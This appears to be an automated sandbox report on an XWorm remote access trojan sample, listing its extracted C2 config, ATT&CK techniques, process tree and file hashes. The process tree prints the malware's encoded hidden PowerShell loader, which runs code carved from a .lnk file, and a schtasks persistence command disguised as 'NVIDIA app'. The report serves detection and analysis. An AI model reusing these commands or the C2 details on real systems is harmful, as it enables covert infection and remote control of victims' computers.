xworm | hxxps://gofile[.]io/d/0hxASt

Resubmissions

05/03/2025, 16:37

250305-t5an3stjx4 10

05/03/2025, 16:32

250305-t174sasxfz 10

05/03/2025, 16:30

250305-tzwpcssry5 10

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2025, 16:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/0hxASt

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

181.214.214.6:30120

Mutex

z5dRlxK0ktwBzYfm

Attributes

Install_directory
%ProgramData%
install_file
NVIDIA app.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000d000000023ab6-200.dat	family_xworm
behavioral1/memory/444-207-0x0000000000A20000-0x0000000000A30000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5312	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	2v1.exe

Executes dropped EXE 2 IoCs

pid	Process
444	2v1.exe
4348	NVIDIA app.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings	powershell.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
552	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5280	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
3804	msedge.exe
3804	msedge.exe
1084	msedge.exe
1084	msedge.exe
3488	identity_helper.exe
3488	identity_helper.exe
5016	msedge.exe
5016	msedge.exe
5312	powershell.exe
5312	powershell.exe
5312	powershell.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4684	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeRestorePrivilege	5464	7zFM.exe
Token: 35	5464	7zFM.exe
Token: SeRestorePrivilege	5868	7zG.exe
Token: 35	5868	7zG.exe
Token: SeSecurityPrivilege	5868	7zG.exe
Token: SeSecurityPrivilege	5868	7zG.exe
Token: SeDebugPrivilege	5312	powershell.exe
Token: SeDebugPrivilege	444	2v1.exe
Token: SeDebugPrivilege	444	2v1.exe
Token: SeDebugPrivilege	4348	NVIDIA app.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
5464	7zFM.exe
5464	7zFM.exe
5868	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe
1084	msedge.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4684	OpenWith.exe
4684	OpenWith.exe
4684	OpenWith.exe
4684	OpenWith.exe
4684	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1084 wrote to memory of 2876	1084	msedge.exe	88
PID 1084 wrote to memory of 2876	1084	msedge.exe	88
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 2448	1084	msedge.exe	89
PID 1084 wrote to memory of 3804	1084	msedge.exe	90
PID 1084 wrote to memory of 3804	1084	msedge.exe	90
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91
PID 1084 wrote to memory of 2536	1084	msedge.exe	91

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/0hxASt
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd96be46f8,0x7ffd96be4708,0x7ffd96be4718
  2⤵
  PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:2448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
  2⤵
  PID:2536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
  2⤵
  PID:2796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
  2⤵
  PID:460
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
  2⤵
  PID:5016
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
  2⤵
  PID:4152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4192 /prefetch:8
  2⤵
  PID:2716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
  2⤵
  PID:2420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
  2⤵
  PID:5460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1888 /prefetch:1
  2⤵
  PID:5456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
  2⤵
  PID:5772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:5780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,736100804608202408,5032791237110705153,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5432

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3440

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5092

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4684

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5324

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\crashfiveguard (2).rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5464

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\crashfiveguard (2)\" -spe -an -ai#7zMap9297:98:7zEvent24508
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -noe -WindowStyle hidden -e JABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUAIAA9ACAAMAB4ADAAMAAwADEAOQBlAGYANgAKACQAcwBjAHIAaQBwAHQAXwBsAGUAbgBnAHQAaAAgAD0AIAAyADcAOAA4ADsACgAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAKgAuAGwAbgBrACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAANQAxADIAMAAwAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQA7AAoACgBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACkAKQAKAHsACgAkAHYAYQBsACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAuAC8AIAAtAEYAaQBsAHQAZQByACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAFIAZQBjAHUAcgBzAGUAOwAKAGkAZgAgACgALQBuAG8AdAAgACQAdgBhAGwAKQAKAHsACgBlAHgAaQB0AAoAfQAKAFsASQBPAC4ARABpAHIAZQBjAHQAbwByAHkAXQA6ADoAUwBlAHQAQwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAoACQAdgBhAGwALgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlACkAOwAKAH0ACgAkAGYAaQBsAGUAcwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAGYAaQBsAGUAbgBhAG0AZQAsACcATwBwAGUAbgAnACwAJwBSAGUAYQBkACcALAAnAFIAZQBhAGQAVwByAGkAdABlACcAOwAKACQAdgBhAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACgAJABzAGMAcgBpAHAAdABfAGwAZQBuAGcAdABoACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBTAGUAZQBrACgAJABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJAB2AGEAbAAsADAALAAkAHMAYwByAGkAcAB0AF8AbABlAG4AZwB0AGgAKQA7AAoAJAB2AGEAbAAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABDAGgAYQByAEEAcgByAGEAeQAoACQAdgBhAGwALAAwACwAJAB2AGEAbAAuAEwAZQBuAGcAdABoACkAOwAKACQAcwB0AHIAaQBuAGcAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB2AGEAbAApADsACgBpAGUAeAAgACQAcwB0AHIAaQBuAGcAOwA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5312
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\tesasd.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:552
- C:\Users\Admin\AppData\Local\2v1.exe
  "C:\Users\Admin\AppData\Local\2v1.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:444
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "NVIDIA app" /tr "C:\ProgramData\NVIDIA app.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5280

C:\ProgramData\NVIDIA app.exe
"C:\ProgramData\NVIDIA app.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\2v1.exe

Filesize
39KB

MD5
4806c4d94f23b4aa628a7429255dde3e

SHA1
7588e35d34ed8184e34364faf72a3171b9a853ee

SHA256
38027f90b5fa2ddf926f00a1fc93e12e47dc76c0c55d4b75e28205eee31dc573

SHA512
45c16a1fc3985bab29910dc08cad2e10773ab8b59a776220c84698027c84be9a006a6ec311b3a3bcbb3e4c872664f317242783a602e06ef6032cdf9a14accdbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
395082c6d7ec10a326236e60b79602f2

SHA1
203db9756fc9f65a0181ac49bca7f0e7e4edfb5b

SHA256
b9ea226a0a67039df83a9652b42bb7b0cc2e6fa827d55d043bc36dd9d8e4cd25

SHA512
7095c260b87a0e31ddfc5ddf5730848433dcede2672ca71091efb8c6b1b0fc3333d0540c3ce41087702c99bca22a4548f12692234188e6f457c2f75ab12316bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e27df0383d108b2d6cd975d1b42b1afe

SHA1
c216daa71094da3ffa15c787c41b0bc7b32ed40b

SHA256
812f547f1e22a4bd045b73ff548025fabd59c6cba0da6991fdd8cfcb32653855

SHA512
471935e26a55d26449e48d4c38933ab8c369a92d8f24fd6077131247e8d116d95aa110dd424fa6095176a6c763a6271e978766e74d8022e9cdcc11e6355408ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
37cc86e252781717ca4dcaa12bece0b8

SHA1
17571aecd683f0dfa499d1211781a84d488be16f

SHA256
98c88bea36fcbeb3efe5f15ee72025f91da0515a735811abf5e187f3e4855271

SHA512
435140d71b866e2404e6b5997f6b34e7fce2ef454e441d8da58b3b777c696e2dee38f5c8d7615ae3c5d494655453b421b83dc63202f6bfc3e45f4a10cad305b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
391B

MD5
2457be50ca5be33950315803b7ecdba7

SHA1
be05990d93a2c5ca87607929db70350fcc10774b

SHA256
2adbe9e90f38db9cf4280d3894086019c04cbb75f6a394265281fe60a767dfdd

SHA512
5c3fd0c059b674218b8745ae3cdb158b54bf7e9f21bfac0f3370c1019138eb649d5b3efb8ac7064b64d6a7a1e8f1d66aa60976ed992b413024e5d876e606bf41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
78a8173161205d76b03738f3a68922a9

SHA1
7adae17daad00d1c7b5afd348e49b70a2394d792

SHA256
785a5455495f1d752a0d3988da035573f08d3bdc0a819a5fe2378ad160bfe388

SHA512
e393dd23c3c3a1214f676510f71ad84e30222f5ab64cae6303d65bd245d30578ee7ef1bf9439352cf3ddf7cbead12bbf3506f16c31db0ebaf013de484d8a3c63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
098260765b1d23a09014ad7199b64f59

SHA1
3fdf3b14b7cfb07c7c591560e753d09e61d85b48

SHA256
c0da5541f26b56958e5491decfbad19cd835591d9c8a51a3c2f8692329e9dd09

SHA512
a91b4b4f97fe183286e5cc5805fa668f6cc23f2c42541283a921740af0c412478bfc441ae21189bdcd79913bd10f6503e752c7b022fa7437e013e1c50966cc1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
da586f6b779230cc16b5a588dee082f1

SHA1
e5a218ee88ddc9fac3c0aef85e3d0c71aa0a37ed

SHA256
b624bc8d4eb50d9e7c9461bb7803250ca544ccd8abfce97b2459f2e33f24c5a9

SHA512
790e34f3eca0193ae57872d50e234e32f3c7c199dc7cdda5a13a5f9c0470490ef6351c6866e3b2dd69362e69bd73637bedd5bce26c2cd3b75c5e81a13765b289

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

